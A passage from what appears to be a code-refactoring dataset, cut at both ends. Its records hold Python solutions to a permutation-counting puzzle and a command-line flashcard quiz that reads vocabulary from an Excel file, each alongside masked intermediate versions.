munge(input: AnyStr, sep: AnyStr = None, limit=1000,\n extra: Union[str, dict] = None) -> AnyStr:\n pass\n\n\n#: E225:24 E225:26\ndef x(b: tuple = (1, 2))->int:\n return a + b\n\n\n#: E252:11 E252:12 E231:8\ndef b(a:int=1):\n pass\n\n\nif alpha[:-i]:\n *a, b = (1, 2, 3)\n\n\n# Named only arguments\ndef foo(*, asdf):\n pass\n\n\ndef foo2(bar, *, asdf=2):\n pass\n",
"step-ids": [
5,
7,
8,
10,
13
]
}
|
[
5,
7,
8,
10,
13
] |
from __future__ import annotations
from functools import cache
class Solution:
def countArrangement(self, n: int) -> int:
cache = {}
def helper(perm):
digits = len(perm)
if digits == 1:
return 1
if perm in cache:
return cache[perm]
cnt = 0
for i in range(digits):
if perm[i] % digits == 0 or digits % perm[i] == 0:
cnt += helper(perm[:i] + perm[i+1:])
cache[perm] = cnt
return cnt
return helper(tuple(range(1, n+1)))
class Solution:
def countArrangement(self, n: int) -> int:
# total number of bitset states possible
bitset_total = 2**n
dp = [[0 for _ in range(bitset_total)]
for _ in range(n+1)]
# all other valid states lead to this base case so mark this as 1
dp[0][0] = 1
# iterate over all positions
for i in range(1, n+1):
# iterate over all subsets
for bm in range(bitset_total):
# iterate over all numbers
for num in range(n):
# if number is not visited and satisfies condition in question
# & (各桁が両方とも1なら1になる)
# 1 << x (1を左にxシフトさせて右をゼロで埋める)
# ^ (XOR: 各桁の片方が1なら1になる)
if ((bm & (1 << num)) and
(((num+1) % i == 0) or
(i % (num+1) == 0))):
dp[i][bm] += dp[i-1][bm ^ (1 << num)]
return dp[-1][-1]
# bm is binary mask for visited numbers.
# i is current place we want to fill.
# Idea is to start from the end, and fill places in opposite direction,
# because for big numbers we potentially have less candidates.
# how dfs(bm, pl) will work:
# If we reached place 0 and procces was not interrupted so far,
# it means that we find beautiful arrangement.
# For each number 1, 2, ..., n we try to put this number on place pl:
# and we need to check two conditions: first, that this place is still empty,
# using bitmask and secondly that one of the two properties for beutiful arrangement
# holds. In this case we add dfs(bm^1<<i, pl - 1) to final answer.
# Finally, we run dfs(0, n): from the last place and with empty bit-mask.
class Solution:
def countArrangement(self, n: int) -> int:
@cache
def dfs(bm, i):
if i == 0:
return 1
cnt = 0
for num in range(n):
if not bm & 1 << num\
and ((num+1) % i == 0 or i % (num+1) == 0):
cnt += dfs(bm ^ 1 << num, i-1)
return cnt
return dfs(0, n)
# nums is the set of still available numbers.
# Note that my i goes downwards, from n to 1. Because position i = 1
# can hold any number, so I don't even have to check whether the last
# remaining number fits there. Also, position i = 2 happily holds
# every second number and i = 3 happily holds every third number,
# so filling the lowest positions last has a relatively high chance of success.
class Solution:
def countArrangement(self, n: int) -> int:
def count(i, nums):
if i == 1:
return 1
return sum(count(i-1, nums-{num})
for num in nums
if num % i == 0 or i % num == 0)
return count(n, set(range(1, n+1)))
|
normal
|
{
"blob_id": "e6acc7b022001d8419095ad6364a6ae9504ec7aa",
"index": 508,
"step-1": "<mask token>\n\n\nclass Solution:\n <mask token>\n\n\nclass Solution:\n\n def countArrangement(self, n: int) ->int:\n\n @cache\n def dfs(bm, i):\n if i == 0:\n return 1\n cnt = 0\n for num in range(n):\n if not bm & 1 << num and ((num + 1) % i == 0 or i % (num + \n 1) == 0):\n cnt += dfs(bm ^ 1 << num, i - 1)\n return cnt\n return dfs(0, n)\n\n\nclass Solution:\n\n def countArrangement(self, n: int) ->int:\n\n def count(i, nums):\n if i == 1:\n return 1\n return sum(count(i - 1, nums - {num}) for num in nums if num %\n i == 0 or i % num == 0)\n return count(n, set(range(1, n + 1)))\n",
"step-2": "<mask token>\n\n\nclass Solution:\n\n def countArrangement(self, n: int) ->int:\n bitset_total = 2 ** n\n dp = [[(0) for _ in range(bitset_total)] for _ in range(n + 1)]\n dp[0][0] = 1\n for i in range(1, n + 1):\n for bm in range(bitset_total):\n for num in range(n):\n if bm & 1 << num and ((num + 1) % i == 0 or i % (num + \n 1) == 0):\n dp[i][bm] += dp[i - 1][bm ^ 1 << num]\n return dp[-1][-1]\n\n\nclass Solution:\n\n def countArrangement(self, n: int) ->int:\n\n @cache\n def dfs(bm, i):\n if i == 0:\n return 1\n cnt = 0\n for num in range(n):\n if not bm & 1 << num and ((num + 1) % i == 0 or i % (num + \n 1) == 0):\n cnt += dfs(bm ^ 1 << num, i - 1)\n return cnt\n return dfs(0, n)\n\n\nclass Solution:\n\n def countArrangement(self, n: int) ->int:\n\n def count(i, nums):\n if i == 1:\n return 1\n return sum(count(i - 1, nums - {num}) for num in nums if num %\n i == 0 or i % num == 0)\n return count(n, set(range(1, n + 1)))\n",
"step-3": "<mask token>\n\n\nclass Solution:\n <mask token>\n\n\nclass Solution:\n\n def countArrangement(self, n: int) ->int:\n bitset_total = 2 ** n\n dp = [[(0) for _ in range(bitset_total)] for _ in range(n + 1)]\n dp[0][0] = 1\n for i in range(1, n + 1):\n for bm in range(bitset_total):\n for num in range(n):\n if bm & 1 << num and ((num + 1) % i == 0 or i % (num + \n 1) == 0):\n dp[i][bm] += dp[i - 1][bm ^ 1 << num]\n return dp[-1][-1]\n\n\nclass Solution:\n\n def countArrangement(self, n: int) ->int:\n\n @cache\n def dfs(bm, i):\n if i == 0:\n return 1\n cnt = 0\n for num in range(n):\n if not bm & 1 << num and ((num + 1) % i == 0 or i % (num + \n 1) == 0):\n cnt += dfs(bm ^ 1 << num, i - 1)\n return cnt\n return dfs(0, n)\n\n\nclass Solution:\n\n def countArrangement(self, n: int) ->int:\n\n def count(i, nums):\n if i == 1:\n return 1\n return sum(count(i - 1, nums - {num}) for num in nums if num %\n i == 0 or i % num == 0)\n return count(n, set(range(1, n + 1)))\n",
"step-4": "<mask token>\n\n\nclass Solution:\n\n def countArrangement(self, n: int) ->int:\n cache = {}\n\n def helper(perm):\n digits = len(perm)\n if digits == 1:\n return 1\n if perm in cache:\n return cache[perm]\n cnt = 0\n for i in range(digits):\n if perm[i] % digits == 0 or digits % perm[i] == 0:\n cnt += helper(perm[:i] + perm[i + 1:])\n cache[perm] = cnt\n return cnt\n return helper(tuple(range(1, n + 1)))\n\n\nclass Solution:\n\n def countArrangement(self, n: int) ->int:\n bitset_total = 2 ** n\n dp = [[(0) for _ in range(bitset_total)] for _ in range(n + 1)]\n dp[0][0] = 1\n for i in range(1, n + 1):\n for bm in range(bitset_total):\n for num in range(n):\n if bm & 1 << num and ((num + 1) % i == 0 or i % (num + \n 1) == 0):\n dp[i][bm] += dp[i - 1][bm ^ 1 << num]\n return dp[-1][-1]\n\n\nclass Solution:\n\n def countArrangement(self, n: int) ->int:\n\n @cache\n def dfs(bm, i):\n if i == 0:\n return 1\n cnt = 0\n for num in range(n):\n if not bm & 1 << num and ((num + 1) % i == 0 or i % (num + \n 1) == 0):\n cnt += dfs(bm ^ 1 << num, i - 1)\n return cnt\n return dfs(0, n)\n\n\nclass Solution:\n\n def countArrangement(self, n: int) ->int:\n\n def count(i, nums):\n if i == 1:\n return 1\n return sum(count(i - 1, nums - {num}) for num in nums if num %\n i == 0 or i % num == 0)\n return count(n, set(range(1, n + 1)))\n",
"step-5": "from __future__ import annotations\nfrom functools import cache\n\n\nclass Solution:\n def countArrangement(self, n: int) -> int:\n cache = {}\n\n def helper(perm):\n digits = len(perm)\n if digits == 1:\n return 1\n if perm in cache:\n return cache[perm]\n cnt = 0\n for i in range(digits):\n if perm[i] % digits == 0 or digits % perm[i] == 0:\n cnt += helper(perm[:i] + perm[i+1:])\n cache[perm] = cnt\n return cnt\n\n return helper(tuple(range(1, n+1)))\n\n\nclass Solution:\n def countArrangement(self, n: int) -> int:\n # total number of bitset states possible\n bitset_total = 2**n\n dp = [[0 for _ in range(bitset_total)]\n for _ in range(n+1)]\n # all other valid states lead to this base case so mark this as 1\n dp[0][0] = 1\n # iterate over all positions\n for i in range(1, n+1):\n # iterate over all subsets\n for bm in range(bitset_total):\n # iterate over all numbers\n for num in range(n):\n # if number is not visited and satisfies condition in question\n # & (各桁が両方とも1なら1になる)\n # 1 << x (1を左にxシフトさせて右をゼロで埋める)\n # ^ (XOR: 各桁の片方が1なら1になる)\n if ((bm & (1 << num)) and\n (((num+1) % i == 0) or\n (i % (num+1) == 0))):\n dp[i][bm] += dp[i-1][bm ^ (1 << num)]\n return dp[-1][-1]\n\n\n# bm is binary mask for visited numbers.\n# i is current place we want to fill. \n# Idea is to start from the end, and fill places in opposite direction,\n# because for big numbers we potentially have less candidates.\n# how dfs(bm, pl) will work:\n# If we reached place 0 and procces was not interrupted so far,\n# it means that we find beautiful arrangement.\n# For each number 1, 2, ..., n we try to put this number on place pl:\n# and we need to check two conditions: first, that this place is still empty,\n# using bitmask and secondly that one of the two properties for beutiful arrangement\n# holds. In this case we add dfs(bm^1<<i, pl - 1) to final answer.\n# Finally, we run dfs(0, n): from the last place and with empty bit-mask.\nclass Solution:\n def countArrangement(self, n: int) -> int:\n @cache\n def dfs(bm, i):\n if i == 0:\n return 1\n\n cnt = 0\n for num in range(n):\n if not bm & 1 << num\\\n and ((num+1) % i == 0 or i % (num+1) == 0):\n cnt += dfs(bm ^ 1 << num, i-1)\n return cnt\n\n return dfs(0, n)\n\n\n# nums is the set of still available numbers.\n# Note that my i goes downwards, from n to 1. Because position i = 1\n# can hold any number, so I don't even have to check whether the last\n# remaining number fits there. Also, position i = 2 happily holds\n# every second number and i = 3 happily holds every third number,\n# so filling the lowest positions last has a relatively high chance of success.\nclass Solution:\n def countArrangement(self, n: int) -> int:\n def count(i, nums):\n if i == 1:\n return 1\n return sum(count(i-1, nums-{num})\n for num in nums\n if num % i == 0 or i % num == 0)\n return count(n, set(range(1, n+1)))\n",
"step-ids": [
5,
6,
7,
8,
10
]
}
|
[
5,
6,
7,
8,
10
] |
import argparse
import pandas as pd
import random
import time
class Deck:
def __init__(self, num_cols, front, back):
self.flashcards = []
self.num_cols = num_cols
self.front = front
self.back = back
class Flashcard:
def __init__(self, deck, front, back, column, row):
self.deck = deck
self.front = front
self.back = back
self.column = column
self.row = row
self.correct = False
def show_front(self):
r = "{}: {}".format(self.deck.front, self.front)
return r
def show_back(self):
return "{}: {}".format(self.deck.back, self.back)
def show_card(self):
return "{}: {}, {}: {}".format(self.deck.front, self.front, self.deck.back, self.back)
def show_reverse(self):
return "{}: {}, {}: {}".format(self.deck.back, self.back, self.deck.front, self.front)
def create_deck(filename, num_cols):
df = pd.read_excel(filename)
front = df.columns.values[0]
back = df.columns.values[1]
deck = Deck(num_cols, front, back)
for i in range(num_cols):
front_column = "{}.{}".format(front, i) if i else front
back_column = "{}.{}".format(back, i) if i else back
for row in range(df[front_column].size):
f = df[front_column][row]
b = df[back_column][row]
if not (pd.isnull(f) or pd.isnull(b)):
fc = Flashcard(deck, f.strip(), b.strip(), i, row)
deck.flashcards.append(fc)
return deck
def get_cards_from_deck(deck, first_letter, start_index, number_of_cards):
flashcards = [fc for fc in deck.flashcards if fc.column == first_letter or first_letter == -1]
return flashcards[start_index:number_of_cards+start_index]
def play_game(deck, mode, first_letter, start_index, number_of_cards):
flashcards = get_cards_from_deck(deck, first_letter, start_index, number_of_cards)
play_cards(mode, deck, flashcards)
def play_cards(mode, deck, cards):
source = deck.front if mode%2 == 0 else deck.back
target = deck.back if mode%2 == 0 else deck.front
if mode >= 2:
random.shuffle(cards)
num_cards = len(cards)
start_time = time.time()
for i, fc in enumerate(cards):
source_word = fc.front if mode%2==0 else fc.back
target_word = fc.back if mode%2==0 else fc.front
quiz(fc, source, source_word, target, target_word, i, num_cards)
print("All Done!")
correct = sum(fc.correct == True for fc in cards)
incorrect = len(cards) - correct
print("Correct: {}".format(correct))
print("Incorrect: {}".format(incorrect))
if (incorrect):
incorrect_cards = [fc for fc in cards if not fc.correct]
print("\n".join([fc.show_card() for fc in incorrect_cards]))
again = input("review incorrect words (y/n): ")
if again == 'y' or again == '1' or again == 'да':
play_cards(mode, deck, incorrect_cards)
else:
finish_time = time.time()
time_diff = time.gmtime(finish_time - start_time)
avg_time = time.gmtime((finish_time - start_time) / num_cards)
print("Total Time: {}".format(time.strftime("%H:%M:%S", time_diff)))
print("Time per card: {}".format(time.strftime("%H:%M:%S", avg_time)))
def quiz(fc, source_language, source_word, target_language, target_word, i, number_of_cards):
print("Card {}/{}".format(i+1, number_of_cards))
print("{} word: {}".format(source_language, source_word))
answer = input("Enter {} translation: ".format(target_language))
if is_correct(answer, target_word):
fc.correct = True
print("Correct!")
else:
print("Incorrect! Correct answer was: {}".format(target_word))
n = input("Enter {} translation for {}: ".format(target_language, source_word))
def is_correct(answer, target):
return format_for_comparison(answer) == format_for_comparison(target)
def format_for_comparison(word):
# strip whitespace and lowercase
word = word.strip().lower()
# pop off the declensions from the end
word = word.split('(')
# sort the list of meanings
word[0] = word[0].split(', ')
word[0].sort()
# join the first part back together:
word[0] = ', '.join(word[0])
# now add the declensions back on
word = '('.join(word)
return word
def learn_words(deck, first_letter, start_index, number_of_cards):
flashcards = get_cards_from_deck(deck, first_letter, start_index, number_of_cards)
for i, card in enumerate(flashcards):
print("Card {}/{}".format(i+1, number_of_cards))
input("{}\nPractice: ".format(card.show_card()))
input("{}\nPractice: ".format(card.show_front()))
input("{}\nPractice: ".format(card.show_back()))
print("Done! Review learned words:")
for card in flashcards:
print("{}".format(card.show_card()))
def main(filename, first_letter, start_index, number_of_cards, mode):
num_cols = 9
deck = create_deck(filename, num_cols)
print("Welcome to The Flashcard Learner!")
# print("Available Modes:")
# print("0: Quiz - Given a word in {}, provide {} translation".format(deck.front.lower(), deck.back.lower()))
# print("1: Quiz - Given a word in {}, provide {} translation".format(deck.back.lower(), deck.front.lower()))
# print("2: Mode 0 with cards given in random order")
# print("3: Mode 1 with cards given in random order")
# print("4: Learning - Shown {} and {} side by side, practice typing both".format(deck.front.lower(), deck.back.lower()))
# mode = int(input("Enter mode: "))
print("Okay! Let's play!")
if mode == 4:
learn_words(deck, first_letter, start_index, number_of_cards)
else:
play_game(deck, mode, first_letter, start_index, number_of_cards)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Learn flashcards")
parser.add_argument("filename", help="name of .xlsx file with vocab", default="RussianVocab.xlsx")
parser.add_argument("category", type=int, help="e.g. which letter are you learning? (-1: all, 0:a, 1:б, 2:в, etc.)")
parser.add_argument("start", type=int, help="start index (lists are 0-indexed)")
parser.add_argument("num", type=int, help="number of cards you'd like to see")
parser.add_argument("mode", type=int)
args = parser.parse_args()
main(args.filename, args.category, args.start, args.num, args.mode)
|
normal
|
{
"blob_id": "d5903698eb8ed6be531b0cc522d4feff6b79da4e",
"index": 954,
"step-1": "<mask token>\n\n\nclass Deck:\n\n def __init__(self, num_cols, front, back):\n self.flashcards = []\n self.num_cols = num_cols\n self.front = front\n self.back = back\n\n\nclass Flashcard:\n\n def __init__(self, deck, front, back, column, row):\n self.deck = deck\n self.front = front\n self.back = back\n self.column = column\n self.row = row\n self.correct = False\n\n def show_front(self):\n r = '{}: {}'.format(self.deck.front, self.front)\n return r\n\n def show_back(self):\n return '{}: {}'.format(self.deck.back, self.back)\n\n def show_card(self):\n return '{}: {}, {}: {}'.format(self.deck.front, self.front, self.\n deck.back, self.back)\n\n def show_reverse(self):\n return '{}: {}, {}: {}'.format(self.deck.back, self.back, self.deck\n .front, self.front)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Deck:\n\n def __init__(self, num_cols, front, back):\n self.flashcards = []\n self.num_cols = num_cols\n self.front = front\n self.back = back\n\n\nclass Flashcard:\n\n def __init__(self, deck, front, back, column, row):\n self.deck = deck\n self.front = front\n self.back = back\n self.column = column\n self.row = row\n self.correct = False\n\n def show_front(self):\n r = '{}: {}'.format(self.deck.front, self.front)\n return r\n\n def show_back(self):\n return '{}: {}'.format(self.deck.back, self.back)\n\n def show_card(self):\n return '{}: {}, {}: {}'.format(self.deck.front, self.front, self.\n deck.back, self.back)\n\n def show_reverse(self):\n return '{}: {}, {}: {}'.format(self.deck.back, self.back, self.deck\n .front, self.front)\n\n\ndef create_deck(filename, num_cols):\n df = pd.read_excel(filename)\n front = df.columns.values[0]\n back = df.columns.values[1]\n deck = Deck(num_cols, front, back)\n for i in range(num_cols):\n front_column = '{}.{}'.format(front, i) if i else front\n back_column = '{}.{}'.format(back, i) if i else back\n for row in range(df[front_column].size):\n f = df[front_column][row]\n b = df[back_column][row]\n if not (pd.isnull(f) or pd.isnull(b)):\n fc = Flashcard(deck, f.strip(), b.strip(), i, row)\n deck.flashcards.append(fc)\n return deck\n\n\ndef get_cards_from_deck(deck, first_letter, start_index, number_of_cards):\n flashcards = [fc for fc in deck.flashcards if fc.column == first_letter or\n first_letter == -1]\n return flashcards[start_index:number_of_cards + start_index]\n\n\ndef play_game(deck, mode, first_letter, start_index, number_of_cards):\n flashcards = get_cards_from_deck(deck, first_letter, start_index,\n number_of_cards)\n play_cards(mode, deck, flashcards)\n\n\ndef play_cards(mode, deck, cards):\n source = deck.front if mode % 2 == 0 else deck.back\n target = deck.back if mode % 2 == 0 else deck.front\n if mode >= 2:\n random.shuffle(cards)\n num_cards = len(cards)\n start_time = time.time()\n for i, fc in enumerate(cards):\n source_word = fc.front if mode % 2 == 0 else fc.back\n target_word = fc.back if mode % 2 == 0 else fc.front\n quiz(fc, source, source_word, target, target_word, i, num_cards)\n print('All Done!')\n correct = sum(fc.correct == True for fc in cards)\n incorrect = len(cards) - correct\n print('Correct: {}'.format(correct))\n print('Incorrect: {}'.format(incorrect))\n if incorrect:\n incorrect_cards = [fc for fc in cards if not fc.correct]\n print('\\n'.join([fc.show_card() for fc in incorrect_cards]))\n again = input('review incorrect words (y/n): ')\n if again == 'y' or again == '1' or again == 'да':\n play_cards(mode, deck, incorrect_cards)\n else:\n finish_time = time.time()\n time_diff = time.gmtime(finish_time - start_time)\n avg_time = time.gmtime((finish_time - start_time) / num_cards)\n print('Total Time: {}'.format(time.strftime('%H:%M:%S', time_diff)))\n print('Time per card: {}'.format(time.strftime('%H:%M:%S', avg_time)))\n\n\ndef quiz(fc, source_language, source_word, target_language, target_word, i,\n number_of_cards):\n print('Card {}/{}'.format(i + 1, number_of_cards))\n print('{} word: {}'.format(source_language, source_word))\n answer = input('Enter {} translation: '.format(target_language))\n if is_correct(answer, target_word):\n fc.correct = True\n print('Correct!')\n else:\n print('Incorrect! Correct answer was: {}'.format(target_word))\n n = input('Enter {} translation for {}: '.format(target_language,\n source_word))\n\n\ndef is_correct(answer, target):\n return format_for_comparison(answer) == format_for_comparison(target)\n\n\ndef format_for_comparison(word):\n word = word.strip().lower()\n word = word.split('(')\n word[0] = word[0].split(', ')\n word[0].sort()\n word[0] = ', '.join(word[0])\n word = '('.join(word)\n return word\n\n\ndef learn_words(deck, first_letter, start_index, number_of_cards):\n flashcards = get_cards_from_deck(deck, first_letter, start_index,\n number_of_cards)\n for i, card in enumerate(flashcards):\n print('Card {}/{}'.format(i + 1, number_of_cards))\n input('{}\\nPractice: '.format(card.show_card()))\n input('{}\\nPractice: '.format(card.show_front()))\n input('{}\\nPractice: '.format(card.show_back()))\n print('Done! Review learned words:')\n for card in flashcards:\n print('{}'.format(card.show_card()))\n\n\ndef main(filename, first_letter, start_index, number_of_cards, mode):\n num_cols = 9\n deck = create_deck(filename, num_cols)\n print('Welcome to The Flashcard Learner!')\n print(\"Okay! Let's play!\")\n if mode == 4:\n learn_words(deck, first_letter, start_index, number_of_cards)\n else:\n play_game(deck, mode, first_letter, start_index, number_of_cards)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Deck:\n\n def __init__(self, num_cols, front, back):\n self.flashcards = []\n self.num_cols = num_cols\n self.front = front\n self.back = back\n\n\nclass Flashcard:\n\n def __init__(self, deck, front, back, column, row):\n self.deck = deck\n self.front = front\n self.back = back\n self.column = column\n self.row = row\n self.correct = False\n\n def show_front(self):\n r = '{}: {}'.format(self.deck.front, self.front)\n return r\n\n def show_back(self):\n return '{}: {}'.format(self.deck.back, self.back)\n\n def show_card(self):\n return '{}: {}, {}: {}'.format(self.deck.front, self.front, self.\n deck.back, self.back)\n\n def show_reverse(self):\n return '{}: {}, {}: {}'.format(self.deck.back, self.back, self.deck\n .front, self.front)\n\n\ndef create_deck(filename, num_cols):\n df = pd.read_excel(filename)\n front = df.columns.values[0]\n back = df.columns.values[1]\n deck = Deck(num_cols, front, back)\n for i in range(num_cols):\n front_column = '{}.{}'.format(front, i) if i else front\n back_column = '{}.{}'.format(back, i) if i else back\n for row in range(df[front_column].size):\n f = df[front_column][row]\n b = df[back_column][row]\n if not (pd.isnull(f) or pd.isnull(b)):\n fc = Flashcard(deck, f.strip(), b.strip(), i, row)\n deck.flashcards.append(fc)\n return deck\n\n\ndef get_cards_from_deck(deck, first_letter, start_index, number_of_cards):\n flashcards = [fc for fc in deck.flashcards if fc.column == first_letter or\n first_letter == -1]\n return flashcards[start_index:number_of_cards + start_index]\n\n\ndef play_game(deck, mode, first_letter, start_index, number_of_cards):\n flashcards = get_cards_from_deck(deck, first_letter, start_index,\n number_of_cards)\n play_cards(mode, deck, flashcards)\n\n\ndef play_cards(mode, deck, cards):\n source = deck.front if mode % 2 == 0 else deck.back\n target = deck.back if mode % 2 == 0 else deck.front\n if mode >= 2:\n random.shuffle(cards)\n num_cards = len(cards)\n start_time = time.time()\n for i, fc in enumerate(cards):\n source_word = fc.front if mode % 2 == 0 else fc.back\n target_word = fc.back if mode % 2 == 0 else fc.front\n quiz(fc, source, source_word, target, target_word, i, num_cards)\n print('All Done!')\n correct = sum(fc.correct == True for fc in cards)\n incorrect = len(cards) - correct\n print('Correct: {}'.format(correct))\n print('Incorrect: {}'.format(incorrect))\n if incorrect:\n incorrect_cards = [fc for fc in cards if not fc.correct]\n print('\\n'.join([fc.show_card() for fc in incorrect_cards]))\n again = input('review incorrect words (y/n): ')\n if again == 'y' or again == '1' or again == 'да':\n play_cards(mode, deck, incorrect_cards)\n else:\n finish_time = time.time()\n time_diff = time.gmtime(finish_time - start_time)\n avg_time = time.gmtime((finish_time - start_time) / num_cards)\n print('Total Time: {}'.format(time.strftime('%H:%M:%S', time_diff)))\n print('Time per card: {}'.format(time.strftime('%H:%M:%S', avg_time)))\n\n\ndef quiz(fc, source_language, source_word, target_language, target_word, i,\n number_of_cards):\n print('Card {}/{}'.format(i + 1, number_of_cards))\n print('{} word: {}'.format(source_language, source_word))\n answer = input('Enter {} translation: '.format(target_language))\n if is_correct(answer, target_word):\n fc.correct = True\n print('Correct!')\n else:\n print('Incorrect! Correct answer was: {}'.format(target_word))\n n = input('Enter {} translation for {}: '.format(target_language,\n source_word))\n\n\ndef is_correct(answer, target):\n return format_for_comparison(answer) == format_for_comparison(target)\n\n\ndef format_for_comparison(word):\n word = word.strip().lower()\n word = word.split('(')\n word[0] = word[0].split(', ')\n word[0].sort()\n word[0] = ', '.join(word[0])\n word = '('.join(word)\n return word\n\n\ndef learn_words(deck, first_letter, start_index, number_of_cards):\n flashcards = get_cards_from_deck(deck, first_letter, start_index,\n number_of_cards)\n for i, card in enumerate(flashcards):\n print('Card {}/{}'.format(i + 1, number_of_cards))\n input('{}\\nPractice: '.format(card.show_card()))\n input('{}\\nPractice: '.format(card.show_front()))\n input('{}\\nPractice: '.format(card.show_back()))\n print('Done! Review learned words:')\n for card in flashcards:\n print('{}'.format(card.show_card()))\n\n\ndef main(filename, first_letter, start_index, number_of_cards, mode):\n num_cols = 9\n deck = create_deck(filename, num_cols)\n print('Welcome to The Flashcard Learner!')\n print(\"Okay! Let's play!\")\n if mode == 4:\n learn_words(deck, first_letter, start_index, number_of_cards)\n else:\n play_game(deck, mode, first_letter, start_index, number_of_cards)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Learn flashcards')\n parser.add_argument('filename', help='name of .xlsx file with vocab',\n default='RussianVocab.xlsx')\n parser.add_argument('category', type=int, help=\n 'e.g. which letter are you learning? (-1: all, 0:a, 1:б, 2:в, etc.)')\n parser.add_argument('start', type=int, help=\n 'start index (lists are 0-indexed)')\n parser.add_argument('num', type=int, help=\n \"number of cards you'd like to see\")\n parser.add_argument('mode', type=int)\n args = parser.parse_args()\n main(args.filename, args.category, args.start, args.num, args.mode)\n",
"step-4": "import argparse\nimport pandas as pd\nimport random\nimport time\n\n\nclass Deck:\n\n def __init__(self, num_cols, front, back):\n self.flashcards = []\n self.num_cols = num_cols\n self.front = front\n self.back = back\n\n\nclass Flashcard:\n\n def __init__(self, deck, front, back, column, row):\n self.deck = deck\n self.front = front\n self.back = back\n self.column = column\n self.row = row\n self.correct = False\n\n def show_front(self):\n r = '{}: {}'.format(self.deck.front, self.front)\n return r\n\n def show_back(self):\n return '{}: {}'.format(self.deck.back, self.back)\n\n def show_card(self):\n return '{}: {}, {}: {}'.format(self.deck.front, self.front, self.\n deck.back, self.back)\n\n def show_reverse(self):\n return '{}: {}, {}: {}'.format(self.deck.back, self.back, self.deck\n .front, self.front)\n\n\ndef create_deck(filename, num_cols):\n df = pd.read_excel(filename)\n front = df.columns.values[0]\n back = df.columns.values[1]\n deck = Deck(num_cols, front, back)\n for i in range(num_cols):\n front_column = '{}.{}'.format(front, i) if i else front\n back_column = '{}.{}'.format(back, i) if i else back\n for row in range(df[front_column].size):\n f = df[front_column][row]\n b = df[back_column][row]\n if not (pd.isnull(f) or pd.isnull(b)):\n fc = Flashcard(deck, f.strip(), b.strip(), i, row)\n deck.flashcards.append(fc)\n return deck\n\n\ndef get_cards_from_deck(deck, first_letter, start_index, number_of_cards):\n flashcards = [fc for fc in deck.flashcards if fc.column == first_letter or\n first_letter == -1]\n return flashcards[start_index:number_of_cards + start_index]\n\n\ndef play_game(deck, mode, first_letter, start_index, number_of_cards):\n flashcards = get_cards_from_deck(deck, first_letter, start_index,\n number_of_cards)\n play_cards(mode, deck, flashcards)\n\n\ndef play_cards(mode, deck, cards):\n source = deck.front if mode % 2 == 0 else deck.back\n target = deck.back if mode % 2 == 0 else deck.front\n if mode >= 2:\n random.shuffle(cards)\n num_cards = len(cards)\n start_time = time.time()\n for i, fc in enumerate(cards):\n source_word = fc.front if mode % 2 == 0 else fc.back\n target_word = fc.back if mode % 2 == 0 else fc.front\n quiz(fc, source, source_word, target, target_word, i, num_cards)\n print('All Done!')\n correct = sum(fc.correct == True for fc in cards)\n incorrect = len(cards) - correct\n print('Correct: {}'.format(correct))\n print('Incorrect: {}'.format(incorrect))\n if incorrect:\n incorrect_cards = [fc for fc in cards if not fc.correct]\n print('\\n'.join([fc.show_card() for fc in incorrect_cards]))\n again = input('review incorrect words (y/n): ')\n if again == 'y' or again == '1' or again == 'да':\n play_cards(mode, deck, incorrect_cards)\n else:\n finish_time = time.time()\n time_diff = time.gmtime(finish_time - start_time)\n avg_time = time.gmtime((finish_time - start_time) / num_cards)\n print('Total Time: {}'.format(time.strftime('%H:%M:%S', time_diff)))\n print('Time per card: {}'.format(time.strftime('%H:%M:%S', avg_time)))\n\n\ndef quiz(fc, source_language, source_word, target_language, target_word, i,\n number_of_cards):\n print('Card {}/{}'.format(i + 1, number_of_cards))\n print('{} word: {}'.format(source_language, source_word))\n answer = input('Enter {} translation: '.format(target_language))\n if is_correct(answer, target_word):\n fc.correct = True\n print('Correct!')\n else:\n print('Incorrect! Correct answer was: {}'.format(target_word))\n n = input('Enter {} translation for {}: '.format(target_language,\n source_word))\n\n\ndef is_correct(answer, target):\n return format_for_comparison(answer) == format_for_comparison(target)\n\n\ndef format_for_comparison(word):\n word = word.strip().lower()\n word = word.split('(')\n word[0] = word[0].split(', ')\n word[0].sort()\n word[0] = ', '.join(word[0])\n word = '('.join(word)\n return word\n\n\ndef learn_words(deck, first_letter, start_index, number_of_cards):\n flashcards = get_cards_from_deck(deck, first_letter, start_index,\n number_of_cards)\n for i, card in enumerate(flashcards):\n print('Card {}/{}'.format(i + 1, number_of_cards))\n input('{}\\nPractice: '.format(card.show_card()))\n input('{}\\nPractice: '.format(card.show_front()))\n input('{}\\nPractice: '.format(card.show_back()))\n print('Done! Review learned words:')\n for card in flashcards:\n print('{}'.format(card.show_card()))\n\n\ndef main(filename, first_letter, start_index, number_of_cards, mode):\n num_cols = 9\n deck = create_deck(filename, num_cols)\n print('Welcome to The Flashcard Learner!')\n print(\"Okay! Let's play!\")\n if mode == 4:\n learn_words(deck, first_letter, start_index, number_of_cards)\n else:\n play_game(deck, mode, first_letter, start_index, number_of_cards)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Learn flashcards')\n parser.add_argument('filename', help='name of .xlsx file with vocab',\n default='RussianVocab.xlsx')\n parser.add_argument('category', type=int, help=\n 'e.g. which letter are you learning? (-1: all, 0:a, 1:б, 2:в, etc.)')\n parser.add_argument('start', type=int, help=\n 'start index (lists are 0-indexed)')\n parser.add_argument('num', type=int, help=\n \"number of cards you'd like to see\")\n parser.add_argument('mode', type=int)\n args = parser.parse_args()\n main(args.filename, args.category, args.start, args.num, args.mode)\n",
